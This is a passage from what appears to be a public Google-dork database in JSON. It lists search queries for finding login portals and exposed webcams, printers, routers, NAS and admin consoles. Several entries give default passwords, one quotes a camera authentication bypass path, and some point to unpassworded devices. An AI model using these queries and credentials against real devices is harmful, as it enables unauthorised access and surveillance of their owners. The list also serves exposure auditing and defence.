16/10/2023\r\n# Exploit Chinmay Divekar"}, {"dork": "inurl:/ui/login.aspx", "description": "# Google Dork: inurl:/ui/login.aspx\r\n# Pages Containing Login Portals\r\n# Date: 18/10/2023\r\n# Exploit Nishchayjeet Singh"}, {"dork": "intitle:\"online portal login\"", "description": "# Google Dork: intitle:\"online portal login\"\r\n# Pages Containing Login Portals\r\n# Date:19/10/2023\r\n# Exploit Author: Safein Sadad"}, {"dork": "initial:inurl:uux.aspx", "description": "# Google Dork: initial:inurl:uux.aspx\r\n# Pages Containing Login Portals\r\n# Date:19/10/2023\r\n# Exploit Author: Abdullah Al Maksud"}, {"dork": "intitle:\"Unibox Administration\"", "description": "# Google Dork: intitle:\"Unibox Administration\"\r\n# Pages Containing Login Portals\r\n# Date: 25/10/2023\r\n# Exploit Hetkumar Desai"}, {"dork": "Submitting a google dork.", "description": "# Google Dork: inurl:\"/login.aspx\" intitle:\"pass\".\r\n# Pages Containing Login Portals\r\n# Date: 30/10/2023\r\n# Exploit swara kalsekar"}, {"dork": "site:..us inurl:\"login.php\"", "description": "# Google Dork: site:..us inurl:\"login.php\"\r\n# Pages Containing Login Portals\r\n# Date: 30/10/2023\r\n# Exploit Husain Ahmad"}, {"dork": "intitle:\"Login - Jorani\"", "description": "# Google Dork: intitle:\"Login - Jorani\"\r\n# Pages Containing Login Portals\r\n# Date: 31/10/2023\r\n# Exploit Bipin Jitiya"}, {"dork": "inurl:/restgui/start.html", "description": "# Google Dork: inurl:/restgui/start.html\r\n# Pages Containing Login Portals\r\n# Date: 01/11/2023\r\n# Exploit: Louise E"}, {"dork": "intitle:\"cs141 webmanager\"", "description": "# Google Dork: intitle:\"cs141 webmanager\"\r\n# Pages Containing Login Portals\r\n# Date: 01/11/2023\r\n# Exploit: Louise E"}, {"dork": "site:.com inurl:login | inurl:logon | inurl:sign-in | inurl:signin | inurl:portal", "description": "# Google Dork: site:.com inurl:login | inurl:logon | inurl:sign-in | inurl:signin | inurl:portal\r\n# Pages Containing Login Portals\r\n# Date: 07/11/2023\r\n# Exploit: Qais Qais"}, {"dork": "site:login.*.* site:portal.*.*", "description": "# Google Dork: site:login.*.* site:portal.*.*\r\n# Pages Containing Login Portals\r\n# Date: 09/11/2023\r\n# Exploit: Anas Zakir"}, {"dork": "site:admin.*.* inurl:login", "description": "# Google Dork: site:admin.*.* inurl:login\r\n# Pages Containing Login Portals\r\n# Date: 10/11/2023\r\n# Exploit Author: Praharsh Kumar Singh"}, {"dork": "site:prod.*.* inurl:login", "description": "# Google Dork: site:prod.*.* inurl:login\r\n# Pages Containing Login Portals\r\n# Date: 10/11/2023\r\n# Exploit Author: Praharsh Kumar Singh"}, {"dork": "allintitle:\"ASPECT Control Panel\"", "description": "# Google Dork: allintitle:\"ASPECT Control Panel\"\r\n# Pages Containing Login Portals\r\n# Date: 11/12/2023\r\n# Exploit: Thomas Heverin"}, {"dork": "allintitle:\"CAT12CE - WebInterface\"", "description": "# Google Dork: allintitle:\"CAT12CE - WebInterface\"\r\n# Pages Containing Login Portals\r\n# Date: 11/12/2023\r\n# Exploit: Thomas Heverin"}, {"dork": "allintitle:\"code-server login\"", "description": "# Google Dork: allintitle:\"code-server login\"\r\n# Pages Containing Login Portals\r\n# Date: 11/12/2023\r\n# Exploit: Thomas Heverin"}, {"dork": "inurl:\"UserLogin/\" intitle:\"Panel\"", "description": "# Google Dork: inurl:\"UserLogin/\" intitle:\"Panel\"\r\n# Pages Containing Login Portals\r\n# Date: 11/12/2023\r\n# Exploit: saurabh kode"}], "Various Online Devices": [{"dork": "intitle:\"remote ui:top page\"", "description": "The \"large\" Canon ImageReady machines with model versions 3300, 5000 & 60000."}, {"dork": "inurl:hp/device/this.LCDispatcher", "description": "This one gets you on the web interface of some more HP Printers."}, {"dork": "intitle:webeye inurl:login.ml", "description": "This one gets you on the webinterface of Webeye webcams."}, {"dork": "intitle:\"DEFAULT_CONFIG - HP\"", "description": "searches for the web interface of HP switches."}, {"dork": "camera linksys inurl:main.cgi", "description": "Another webcam, Linksys style."}, {"dork": "intitle:\"my webcamXP server!\" inurl:\":8080\"", "description": "\"my webcamXP server!\"Is there really an explantation needed?"}, {"dork": "intitle:\"toshiba network camera - User Login\"", "description": "Web interface of Toshiba network cameras."}, {"dork": "\"please visit\" intitle:\"i-Catcher Console\" Copyright \"iCode Systems\"", "description": "CCTV webcams by ICode."}, {"dork": "intext:\"Ready with 10/100T Ethernet\"", "description": "Xerox 860 and 8200 Printers."}, {"dork": "intext:\"UAA (MSB)\" Lexmark -ext:pdf", "description": "Lexmark printers (T620, T522, Optra T614, E323, T622, Optra T610, Optra T616, T520 and Optra S 1855)"}, {"dork": "\"Starting SiteZAP 6.0\"", "description": "siteZap webcams !"}, {"dork": "intitle:\"EvoCam\" inurl:\"webcam.html\"", "description": "Evocams !"}, {"dork": "intext:\"Videoconference Management System\" ext:htm", "description": "Tandberg video conferencing appliancesThe webinterface enables you to drop calls and to browse the internal phonebook"}, {"dork": "\"Copyright (c) Tektronix, Inc.\" \"printer status\"", "description": "Captain, the Phasers are online :)"}, {"dork": "intext:\"MaiLinX Alert (Notify)\" -site:networkprinters.com", "description": "Xerox DocuPrint printer models."}, {"dork": "inurl:\"printer/main.html\" intext:\"settings\"", "description": "Brother HL Printers."}, {"dork": "intitle:\"Live NetSnap Cam-Server feed\"", "description": "Netsnap Online Cameras"}, {"dork": "intitle:\"V-Gear BEE\"", "description": "V-Gear Bee Web Cameras"}, {"dork": "intitle:\"iVISTA.Main.Page\"", "description": "And again another webcam search. MOst of these cams seem to be security cams"}, {"dork": "intitle:\"SpeedStream * Management Interface\"", "description": "a lot of Speed stream routers :)"}, {"dork": "inurl:\"next_file=main_fs.htm\" inurl:img inurl:image.cgi", "description": "Linksys Wireless-G web cams."}, {"dork": "intitle:\"Network Print Server\" filetype:shtm ( inurl:u_printjobs | inurl:u_server | inurl:a_server | inurl:u_generalhelp | u_printjobs )", "description": "Axis Network Print Server devices. This search has all the possible urls (more than strictly needed), but those are added in case Google decides to index them in the future."}, {"dork": "intitle:\"Network Print Server\" intext:\"http://www.axis.com\" filetype:shtm", "description": "Axis Network Print Server devices (a better shorter search)."}, {"dork": "intitle:\"Browser Launch Page\"", "description": "An ActiveX based webcam - so use MS IE"}, {"dork": "intitle:\"EpsonNet WebAssist Rev\"", "description": "This reveals the Epson Web Assist page (internal to the machine)"}, {"dork": "intitle:\"Brother\" intext:\"View Configuration\" intext:\"Brother Industries, Ltd.\"", "description": "Finds a real bunch of Brother printers"}, {"dork": "intitle:\"switch login\" \"IBM Fast Ethernet Desktop\"", "description": "IBM 8275 Model 416 High Performance Ethernet Workgroup Switch"}, {"dork": "intitle:Linksys site:ourlinksys.com", "description": "Ourlinksys.com DDNS entries pointing to Linksys web enabled cameras"}, {"dork": "intext:\"Please enter correct password for Administrator Access. Thank you\" \"Copyright \u00c3\u0192\u00e2\u20ac\u0161\u00c3\u201a\u00c2\u00a9 2003 SMC Networks, Inc. All rights reserved.\"", "description": "Finds SMC Routers."}, {"dork": "inurl:camctrl.cgi", "description": "Vivotec web cams"}, {"dork": "intitle:\"active webcam page\"", "description": "searches for \"Active Webcam\" feeds on websites, a popular USB webcam interface."}, {"dork": "intitle:HomeSeer.Web.Control | Home.Status.Events.Log", "description": "HomeSeer (http://www.homeseer.com/) provides a well known home automation solution (software + hardware)This dork will find web interfaces of homeseer."}, {"dork": "intitle:\"Flash Operator Panel\" -ext:php -wiki -cms -inurl:asternic -inurl:sip -intitle:ANNOUNCE -inurl:lists", "description": "Flash Operator Panel is a switchboard type application for the Asterisk PBX. It runs on a web browser with the flash plugin. It is able to display information about your PBX activity in real time."}, {"dork": "intitle:\"Service Managed Gateway Login\"", "description": "service Managed Gateway from VirtualAccess login page"}, {"dork": "intitle:\"actiontec\" main setup status \"Copyright 2001 Actiontec Electronics Inc\"", "description": "Actiontec Routers."}, {"dork": "\"Webthru User Login\"", "description": "samsung webthru cameras"}, {"dork": "intitle:\"OfficeConnect Wireless 11g Access Point\" \"Checking your browser\"", "description": "OfficeConnect Wireless 11g Access Point"}, {"dork": "intitle:\"Lexmark *\" inurl:port_0", "description": "Lexmark printers (4 models)"}, {"dork": "inurl:/en/help.cgi \"ID=*\"", "description": "Aficio printers (this search locates the help pages)"}, {"dork": "intitle:jdewshlp \"Welcome to the Embedded Web Server!\"", "description": "HP Officejet help page. Remove \"help.html\" for main page."}, {"dork": "\"display printer status\" intitle:\"Home\"", "description": "Xerox Phaser printers."}, {"dork": "inurl:JPGLogin.htm", "description": "webserver detection for GeoHttpServer, the page is the login page or guest cam. Don't ask why these are mostly doggy cams, weirdness."}, {"dork": "\"Please use Netscape 2.0 or enhance !!\" -site:dlink.com -site:ovislink.com.tw", "description": "A search for some HTML code used in a variety of D-link network devices (webcams and such)."}, {"dork": "ext:dhtml intitle:\"document centre|(home)\" OR intitle:\"xerox\"", "description": "Various Online Devices>Xerox (*Centre)"}, {"dork": "intitle:\"SWW link\" \"Please wait.....\"", "description": "Zyxel Zywall"}, {"dork": "intitle:\"InterJak Web Manager\"", "description": "A router device by Uroam (formerly FilaNet), with email and VPN possibilities."}, {"dork": "intitle:\"Netopia Router (*.)\"\"to view this site\"", "description": "Web admin for netopia routersThis Web tool provides access to information about the current status of your router and connections."}, {"dork": "\"To view the Web interface of the SpeedTouch, Java", "description": "speedtouch 510 DSL modem devices that were once unprotected. That may have changed by now."}, {"dork": "intitle:\"Dell *\" inurl:port_0", "description": "oA few Online Dell Printers, status, paper, toner levels, ips macs, the usual.. (Lexmark and Dell seem to share the same embedded webserver it seems, try changing the vendor name.)"}, {"dork": "intitle:\"PacketShaper Customer Login\"", "description": "PacketShaper Login.Provides login access for PacketShaper Customers."}, {"dork": "( intitle:\"PacketShaper Login\")|(intitle:\"PacketShaper Customer Login\")", "description": "Packeteer's PacketShaper is an application traffic management system that monitors, controls, and accelerates application performance over the WAN Internet."}, {"dork": "(cam1java)|(cam2java)|(cam3java)|(cam4java)|(cam5java)|(cam6java) -navy.mil -backflip -power.ne.jp", "description": "Kpix Java Based Traffic Cameras. Based at CBS broadcasting for San Fransisco, Oakland, and San Jose."}, {"dork": "inurl:\"CgiStart?page=\"", "description": "This search reveals even more Panasonic IP cameras!"}, {"dork": "printers/printman.html", "description": "some interesting information on printer status including Name, Location, Model, Pagecount, Action, Status. This summary page also presents several printers in one list, and the status logs reveal more sensitive information like email addresses."}, {"dork": "intitle:\"configuration\" inurl:port_0", "description": "More dell and lexmark printers, The usual things included."}, {"dork": "intitle:\"Dell Laser Printer M5200\" port_0", "description": "Dell Laser Printer M5200"}, {"dork": "\"RICOH Network Printer D model-Restore Factory\"", "description": "Not a whole lot here."}, {"dork": "intitle:\"GCC WebAdmin\" -gcc.ru", "description": "All sorts of various printer status information"}, {"dork": "tilt intitle:\"Live View / - AXIS\" | inurl:view/view.shtml", "description": "A small modification to the AXIS camera search - it now returns cameras with pan / tilt, which is much more fun!"}, {"dork": "http://www.google.com/search?q=intitle:%22Network+Storage+Link+for+USB+2.0+Disks%22+Firmware#=100&hl=en&lr=&c2coff=1&safe=off&filter=0", "description": "Networked USB hard drives (NSLU2). Be sure to disable Google's filter (&filters=0) as that is where they pop up. Default password (Linksys) is admin:admin (just like all the rest). A majority are locked some are not. Some logins to the NSLU2 will be a link off a website. Enjoy."}, {"dork": "intitle:iDVR -intitle:\"com | net | shop\" -inurl:\"asp | htm | pdf | html | php | shtml | com | at | cgi | tv\"", "description": "Online camera. Default login is administrator and password blank. Video server runs default on port 2000. There is an application DVR Center that is used to connect to server and manage recorded videos."}, {"dork": "intitle:\"Orite IC301\" | intitle:\"ORITE Audio IP-Camera IC-301\" -the -a", "description": "This search finds orite 301 netcams with audio capabilities."}, {"dork": "intitle:\"Netcam\" intitle:\"user login\"", "description": "just yet other online cam."}, {"dork": "intitle:\"Biromsoft WebCam\" -4.0 -serial -ask -crack -software -a -the -build -download -v4 -3.01 -numrange:1-10000", "description": "Brimsoft webcam software enables anyone with a webcam to easily create a webcam http server. This googledork looks for these webcam servers."}, {"dork": "(intitle:\"VisionGS Webcam Software\")|(intext:\"Powered by VisionGS Webcam\") -showthread.php -showpost.php -\"Search Engine\" -computersglobal.com -site:g", "description": "I don't know if the google query got submitted right because it looks truncated. here it is again:(intitle:\"VisionGS Webcam Software\")|(intext:\"Powered by VisionGS Webcam\") -showthread.php -showpost.php -\"Search Engine\" -computersglobal.com -site:golb.org -site:chat.ru -site:findlastminute.de -site:tricus.de -site:urlaubus.de -johnny.ihackstuff VisionGS webcam software enables anyone with a webcam to easily host a webcam http server. This dork finds those servers."}, {"dork": "intitle:\"IQeye302 | IQeye303 | IQeye601 | IQeye602 | IQeye603\" intitle:\"Live Images\"", "description": "This is a googledork for IQeye netcams. Some of which you can control how they tilt/zoom. The default admin username/password are root/system."}, {"dork": "(\"port_255/home\")|(inurl:\"home?port=255\")", "description": "standered printer search. Moderator note: see also dork id=1221"}, {"dork": "\"This page is for configuring Samsung Network Printer\" | printerDetails.htm", "description": "several different samsung printers"}, {"dork": "intitle:\"SNOIE Intel Web Netport Manager\" OR intitle:\"Intel Web Netport Manager Setup/Status\"", "description": "Intel Netport Express Print Server."}, {"dork": "intitle:\"Summit Management Interface\" -georgewbush.org.uk", "description": "Extreme Networks Summit Switches Web admin pages. Server: Allegro-Software-RomPager/2.10"}, {"dork": "intitle:Cisco \"You are using an old browser or have disabled javascript. You must use version 4 or higher of Netscape Navigator/Communicator\"", "description": "Login pages for Ciso VPN Concentrator stuff"}, {"dork": "intitle:\"Iomega NAS Manager\" -ihackstuff.com", "description": "Login page dork for Iomega NAS Manager.. There's only 1 result for it now, but this could change in the future."}, {"dork": "intitle:\"Sony SNT-V304 Video Network Station\" inurl:hsrindex.shtml", "description": "The SNT-V304 Video Network Station.Sony's network camera control station."}, {"dork": "inurl:Printers/ipp_0001.asp", "description": "Thanks to Windows 2003 Remote Printing"}, {"dork": "intitle:Axis inurl:\"/admin/admin.shtml\"", "description": "similar searchs exist. This search finds a few more results as well as access to the Admin area or a login screen depending on Cameras configuration."}, {"dork": "inurl:/img/vr.htm", "description": "Linksys wireless G Camera."}, {"dork": "DCS inurl:\"/web/login.asp\"", "description": "Login pages for the DCS-950 Web Camera. Even comes with a built in microphone."}, {"dork": "intitle:\"Dell Laser Printer *\" port_0 -johnny.ihackstuff", "description": "Dell laser printers. This search finds different results that dork id 1077."}, {"dork": "intitle:\"::::: INTELLINET IP Camera Homepage :::::", "description": "A variation on Jeffball55's original Intellinet Ip Camera.This search finds several more web cams.A suggested secondary search:\"Administrator Menu\" \"camera Name\" \"Location\" \"frame rate\" intitle:network.camera -pdfThanks jeffball."}, {"dork": "intitle:\"AR-*\" \"browser of frame dealing is necessary\"", "description": "A few Sharp printers .."}, {"dork": "intext:\"you to handle frequent configuration jobs easily and quickly\" | intitle:\"Show/Search other devices\"", "description": "ELSA DSL lan modems."}, {"dork": "intitle:\"NAS\" inurl:indexeng.html", "description": "Disk Online Server NAS device."}, {"dork": "intitle:\"Skystream Networks Edge Media Router\" -securitytracker.com", "description": "skystream Networks Edge Media Router."}, {"dork": "intitle:\"Ethernet Network Attached Storage Utility\"", "description": "Linksys network storage utility."}, {"dork": "intitle:\"GigaDrive Utility\"", "description": "Linksys GigaDrive network storage utility."}, {"dork": "intitle:\"DVR Client\" -the -free -pdf -downloads -blog -download -dvrtop", "description": "This dork finds digital video recording client from Nuvico."}, {"dork": "\"OK logout\" inurl:vb.htm?logout=1", "description": "This is a google dork for Hunt Electronics web cams. To get to the cameras remove the vb.htm?logout=1 from the url."}, {"dork": "intitle:\"Edr1680 remote viewer\"", "description": "This search finds the 1680 series digital video recorder from EverFocus."}, {"dork": "intitle:\"IVC Control Panel\"", "description": "this searches for security cameras, vendor site:http://www.ivcco.com/"}, {"dork": "(intitle:MOBOTIX intitle:PDAS) | (intitle:MOBOTIX intitle:Seiten) | (inurl:/pda/index.html +camera)", "description": "more cams...vendor site: http://www.mobotix.com/layout/set/index/language/index"}, {"dork": "intitle:\"Veo Observer XT\" -inurl:shtml|pl|php|htm|asp|aspx|pdf|cfm -intext:observer", "description": "just more results for this:http://johnny.ihackstuff.com/index.php?module=prodreviews&func=showcontent&id=1348"}, {"dork": "(intitle:(EyeSpyFX|OptiCamFX) \"go to camera\")|(inurl:servlet/DetectBrowser)", "description": "just more cameras vendor site: http://www.eyespyfx.com/"}, {"dork": "inurl:cgi-bin/guestimage.html", "description": "just more more MOBOTIX's"}, {"dork": "allintitle: EverFocus | EDSR | EDSR400 Applet", "description": "Modified Everfocus search, pulls in EDSR400's as well s a few strays missed by original query."}, {"dork": "allintitle:Edr1680 remote viewer", "description": "Everfocus EDR1680. Only returns 2 or 3 results, but submitted for completeness sake."}, {"dork": "allintitle: EDR1600 login | Welcome", "description": "Everfocus EDR1600"}, {"dork": "allintitle: EDR400 login | Welcome", "description": "Everfocus EDR400"}, {"dork": "intitle:\"Divar Web Client\"", "description": "Boshe/Divar Net Cameras. Uses ActiveX - IE only."}, {"dork": "intitle:\"Live View / - AXIS\" | inurl:view/view.shtml OR inurl:view/indexFrame.shtml | intitle:\"MJPG Live Demo\" | \"intext:Select preset position\"", "description": "No one search will reveal all Axis cameras. This is my mod of one of the queries. It usualy returns 990-1000 of the 1000 results google allows."}, {"dork": "allintitle: Axis 2.10 OR 2.12 OR 2.30 OR 2.31 OR 2.32 OR 2.33 OR 2.34 OR 2.40 OR 2.42 OR 2.43 \"Network Camera \"", "description": "No one search will reveal all Axis cameras. This is a variant for the 2xxx series."}, {"dork": "inurl:wrcontrollite", "description": "Browse up to 16 security cameras at one time :)"}, {"dork": "\"LANCOM DSL/*-* Office *\" \"Entry Page\"", "description": "h**p://www.lancom-systems.de/Login page for these Lancom online DSL devices."}, {"dork": "allintitle:\"SyncThru Web Service\"", "description": "This search finds Internet-connected Samsung printer control panels."}, {"dork": "inurl:/level/15/exec/-/configure/http", "description": "Default Cisco 2800 Series page"}, {"dork": "inurl:/exec/show/tech-support/cr", "description": "Default Cisco 2800 Series page"}, {"dork": "inurl:/level/15/exec/-", "description": "Default Cisco 2800 Series page"}, {"dork": "intitle:\"HtmlAnvView:D7B039C1\"", "description": "This dork finds Wireless Security/Webcams that are accessible from the \nweb. The interesting part is that for some reason these cameras do not \ngenerally allow users to remove/change the default administrative \nusername and pass. So in most cases you can view any camera that shows \nup in the google search.\nDefault Username: admin01\nDefault Password: 000000\n 111111\n 999999\nAuthor: Paul White"}, {"dork": "inurl:RgFirewallRL.asp | inurl:RgDmzHost.asp | inurl:RgMacFiltering.asp | inurl:RgConnect.asp | inurl:RgEventLog.asp | inurl:RgSecurity.asp | inurl:RgContentFilter.asp | inurl:wlanRadio.asp", "description": "Gateway Routers\nAuthor: GhOsT-PR"}, {"dork": "inurl:cgi-bin/cosmobdf.cgi?", "description": "COSMOView for building management. Author: GhOsT-PR"}, {"dork": "intitle:\"hp laserjet\" inurl:info_configuration.htm", "description": "HP LaserJet printers"}, {"dork": "intext:\"You may also donate through the Moneybookers account mb@dd-wrt\"", "description": "Still find alot of equipment running v24 sp1"}, {"dork": "inurl:/control/userimage.html", "description": "Mobotix webcam search. yet another newer search"}, {"dork": "inurl:/voice/advanced/ intitle:Linksys SPA configuration", "description": "This allows you to look at linksys VOIP Router Config pages."}, {"dork": "inurl:*/graphs* intitle:\"Traffic and system resource graphing\"", "description": "With this search you can view results for mikrotik graphics interfaces\n*Obrigado,*"}, {"dork": "intitle:not accepted inurl:\"union+select\" inurl:\"id?=\"", "description": "Find IDS and Mod security\ndork: intitle:not accepted inurl:\"union+select\" inurl:\"id?=\""}, {"dork": "intext:\"Hikvision\" inurl:\"login.asp\"", "description": "Hikvision IP Camera login page"}, {"dork": "dorks:SiteScope inurl:/SiteScope/cgi/go.exe/SiteScope?page=", "description": "inurl:/SiteScope/cgi/go.exe/SiteScope?page=\ntwitter\n@firebitsbr"}, {"dork": "inurl:cgi-bin/mailgraph.cgi", "description": "Mail statistics\nAriel Anonis - @ariel_anonis"}, {"dork": "\".git\" intitle:\"Index of\"", "description": "Shows publicly browsable .git directories"}, {"dork": "inurl:.cgi-bin/luci", "description": "Directory \" Powered by LuCI Trunk\".\nBy Rootkit."}, {"dork": "intitle:\"AP Router New Generation\" intext:\"Status do AP Router\"", "description": "intitle:\"AP Router New Generation\" intext:\"Status do AP Router\"\nShare-Link"}, {"dork": "inurl:upsstats.cgi?host", "description": "UPS Online Devices. Enjoy!!!.\nBy Rootkit."}, {"dork": "inurl:/graphs/ intitle:RouterOs", "description": "files containing juicy info\nAriel Anonis - @ariel_anonis"}, {"dork": "allinurl:foldercontent.html?folder=", "description": "Devices of NAS Iomega Cloud Services.\nEnjoy!!!.\nBy Rootkit."}, {"dork": "inurl:/set_config_password.html", "description": "Submitter: Gman The Mod-dog"}, {"dork": "intitle:\"Solr Admin\" \"Core Admin\" \"Thread Dump\"", "description": "Apache Solr admin interfaces.\n- Andy G - twitter.com/vxhex"}, {"dork": "intitle:index.of inurl:openwebmail -site:openwebmail.org", "description": "Sites with openwebmail installs.\nDecoy"}, {"dork": "intext:\"This is Apache Hadoop release\" \"Local Logs\"", "description": "Google dork Description: bypass information Apache Hadoop Service\nGoogle search: intext:\"This is Apache Hadoop release\" \"Local Logs\"\nSubmited: 2015-11-12\nNote:\nview Hadoop information. - Yudha[at]glosmon.com"}, {"dork": "intitle:\"router\"inurl:\"home.asp\"", "description": "Few routers that can be accessed without login"}, {"dork": "inurl:trafficcams -intext:trafficcams ext:asp OR ext:htm", "description": "Dork who show cams of traffic of a lot of cities.\nDork By Rootkit Pentester."}, {"dork": "inurl:httpmon.php", "description": "Dork for Zabbix Network Monitoring systems.\nDork Discovered by Rootkit Pentester."}, {"dork": "intitle:\"CPPLUS DVR -Web View\"", "description": "CPPLUS DVR\n- Stefano"}, {"dork": "inurl:\"cgi-bin\" \"No password set!\" \" There is no password set on this router.\"", "description": "Dork reveals panels of router without passwords. Enjoy xD.\nThis Dork discovered by Rootkit Pentester."}, {"dork": "inurl:/tcpipv4.htm", "description": "TCP/IP Settings HP LaserJet Logins\n-Xploit"}, {"dork": "inurl:phpPgAdmin/browser.php intitle:\"phpPgAdmin\"", "description": "Dork For phpPgAdmin servers portal.\nDiscovered for Rootkit Pentester.\nRegards."}, {"dork": "inurl:\"info_deviceStatus.html\" | inurl:\"info_suppliesStatus.html\" | inurl:\"info_configuration.html\" | inurl:\"info_config_network.html\" | inurl:\"info_specialPages.html\" | inurl:\"info_colorUsageJobLog.html\" | inurl:\"info_eventLog.html\"", "description": "Description: HP LaserJet printer web panel\nGoogle search: inurl:\"info_deviceStatus.html\" |\ninurl:\"info_suppliesStatus.html\" | inurl:\"info_configuration.html\" |\ninurl:\"info_config_network.html\" | inurl:\"info_specialPages.html\" |\ninurl:\"info_colorUsageJobLog.html\" | inurl:\"info_eventLog.html\"\nAuthor: nebo_oben"}, {"dork": "inurl:\"/owncloud/public.php\" -github -forum", "description": "Dork for shared files Owncloud.\nHave Fun.\nRegards.\nRootkit Pentester."}, {"dork": "intext:\"Powered by BOMGAR\"", "description": "intext:\"Powered by BOMGAR\""}, {"dork": "intitle:\"StrongLoop API Explorer\" intext:\"Token Not Set\"", "description": "Look for open Strongloop\u2019s loopback API Explorer."}, {"dork": "intitle:\"open webif\" \"Linux set-top-box\"", "description": "Web interface that allows full control of Dreambox TV set-top-boxes."}, {"dork": "intitle:Leaf PHP Mailer by [leafmailer.pw] ext:php", "description": "Leaf PHP Mailer by [leafmailer.pw]\n Enjoy with healthy.\nDork by INILERM"}, {"dork": "inurl:/mjpg/video.mjpg", "description": "axis cameras.\nBy Barak Tawily."}, {"dork": "inurl:\"lvappl.htm\"", "description": "Finds live cameras connected to servers on the internet (mostly security\ncams)\nDxtroyer"}, {"dork": "inurl:\"multimon.cgi\" intitle:\"UPS\"", "description": "Finds live traffic monitors, telling you who's online\nDxtroyer"}, {"dork": "inurl:\"this.LCDispatcher?nav=\"", "description": "Finds HP printers connected to the internet\nDxtroyer"}, {"dork": "inurl:\"http://voicemail.\"", "description": "Various voicemail servers like Cisco Unity Messaging."}, {"dork": "(site:onion.link | site:onion.cab | site:tor2web.org | site:onion.sh | site:tor2web.fi | site:onion.direct)", "description": "Finds sites hosted on the Tor network accessible with Tor2Web servers\nDxtroyer"}, {"dork": "intitle:\"Welcome to ZyXEL\" -zyxel.com", "description": "Finds ZyXEL routers, IP cameras, and other devices\nDxtroyer"}, {"dork": "inurl:\"/view/view.shtml?id=\"", "description": "Finds Axis IP cameras\nDxtroyer"}, {"dork": "inurl:\"http://ftp.dlink\"", "description": "This dork allows us to find lists of FTP directories of D-Link routers\ninurl:\"http://ftp.dlink\"\nDrok3r"}, {"dork": "intitle:\"webcamXP 5\" -download", "description": "Finds WebcamXP cameras\nDxtroyer"}, {"dork": "inurl:\"8080/jmx-console\"", "description": "This dork will list all unauthenticated jboss servers with jmx-console\naccess.\n-- \n\u0130smail Baydan"}, {"dork": "inurl:\"ftp://www.\" \"Index of /\"", "description": "Finds various online FTP servers.\nDxtroyer"}, {"dork": "intitle:\"Setup Home\" \"Internet Status\" -belkin", "description": "Finds lots of internet-connected Arris routers\nDxtroyer"}, {"dork": "inurl:\"g2_view=webdav.WebDavMount\"", "description": "inurl:\"g2_view=webdav.WebDavMount\"\nFinds sites with WebDAV enabled\nTPNight"}, {"dork": "inurl:\"/ADVANCED/COMMON/TOP\"", "description": "Finds unpassworded Epson printers\nDxtroyer"}, {"dork": "intitle:\"Namenode information\"", "description": "Finds unpassworded file systems just waiting to be exploited.\nDxtroyer"}, {"dork": "inurl:\"/ap/recuperadocumentossql.aspx\"", "description": "AuraPortal: Internal file disclosure"}, {"dork": "inurl:login.cgi intitle:NETGEAR", "description": "inurl:login.cgi intitle:NETGEAR\nTo find GSS108E ProSAFE PoE+ Click Switches online.\nOften the default password is \"password\" :)\nhttp://www.fr.netgear.ch/images/datasheet/switches/ClickSwitches/GSS108E_GSS108EPP_GSS116E_DS.pdf\n- cyberdefense"}, {"dork": "intitle:\"cuckoo sandbox\" \"failed_reporting\"", "description": "Dork: intitle:\"cuckoo sandbox\" \"failed_reporting\"\nDescription: Find open Cuckoo sanboxes! Free samples!\nAuthor: scumsec"}, {"dork": "intitle:\"GitBucket\" intext:\"Recent updated repositories\" intext:\"Sign In\"", "description": "Dork: intitle:\"GitBucket\" intext:\"Recent updated repositories\" intext:\"Sign In\"\nDescription: Find GitBucket servers\nAuthor: scumsec"}, {"dork": "intitle:\"Namenode information\" AND inurl:\":50070/dfshealth.html\"", "description": "NameNode Storage Information for Infrastructure Hadoop\n------------------------------\nIng. Daniel Maldonado\nhttp://caceriadespammers.com.ar"}, {"dork": "inurl:\"/api/index.php\" intitle:UniFi", "description": "Finds the UniFi API browser with juicy Information such as WiFi passwords\nredstoner2014"}, {"dork": "intitle:\"twonky server\" inurl:\"9000\" -intext:\"9000\"", "description": "Finds Twonky media-sharing servers\nDxtroyer"}, {"dork": "inurl:scgi-bin intitle:\"NETGEAR ProSafe\"", "description": "NETGEAR ProSafe Dual WAN Gigabit Firewall. Default username: admin. Default password: password\ninurl:scgi-bin intitle:\"NETGEAR ProSafe\"\n--\n@verovan"}, {"dork": "inurl:\"img/main.cgi?next_file\"", "description": "Dork that allows us to find online cameras, be it security, webcams, etc.\ninurl:\"img/main.cgi?next_file\"\nDrok3r [ RedTheam - NATASteam ]"}, {"dork": "inurl:share.cgi?ssid=", "description": "This dork show myQnap cloud servers files and folder shared.\nHave Fun!!!.\nRootkit Pentester."}, {"dork": "inurl:browse.php inurl:kcfinder -github.com", "description": "Panels of files for kcfinder Software. Have fun!.\nDork by Rootkit Pentester."}, {"dork": "inurl:autodiscover/autodiscover ext:xml", "description": "Locate Outlook Web Apps that have auto-discover feature enabled\n-Oni49"}, {"dork": "inurl:indexFrame.shtml Axis", "description": "The AXIS 2400 is a Web server of its own. This means that the server is secured like any other Internet host. It is up to the network manager to restrict access to the AXIS Web Cameras camera server. AXIS Network cams have a cam control page called indexFrame.shtml wich can easily be found by searching Google. An attacker can look for the ADMIN button and try the default passwords found in the documentation. An attacker may also find that the directories are browsable. Additional security related information was found on the Internet.Securityfocus(www.securityfocus.com):----------------------------------------------------\"It has been reported that the Axis Video Servers do not properly handle input to the 'command.cgi' script. Because of this, an attacker may be able to create arbitrary files that would result in a denial of service, or potentially command execution.\" Core Security Technologies Advisory (http://www.coresecurity.com):---------------------------------------------------\"We have discovered the following security vulnerability: by accessing http://camera-ip//admin/admin.shtml (notice the double slash) the authentication for \"admin\" is bypassed and an attacker gains direct access to the configuration."}, {"dork": "intitle:\"View and Configure PhaserLink\"", "description": "These printer's configuration is wide open. Attackers can change just about any value through this control panel. Take it from FX, printers can be dangerous too! Besides, a POP3 server, username and password can be entered into these things! =)"}, {"dork": "inurl:\"ViewerFrame?Mode=\"", "description": "Panasonic Network Cameras can be viewed and controlled from a standard web browser. These cameras can be placed anywhere to keep an eye on things, with no PC required on the location. Check for more information: http://www.panasonic.com/netcam/There is a htaccess protected admin page at \"http://[target-ip]/config.html\" on the target device. Admin logins have no defaults, but created during setup."}, {"dork": "sNC-RZ30 HOME", "description": "sony NC RZ30 camera's require a java capable browser. The admin panel is found at http://[sitename]/home/l4/admin.html."}, {"dork": "intitle:flexwatch intext:\"Home page ver\"", "description": "seyeon provides various type of products and software to build up a remote video monitoring and surveillance system over the TCP/IP network. FlexWATCH\u00c3\u0192\u00c2\u00a2\u00c3\u00a2\u00e2\u201a\u00ac\u00c5\u00be\u00c3\u201a\u00c2\u00a2 Network video server series has built-in Web server based on TCP/IP technology. It also has an embedded RTOS.The admin pages are at 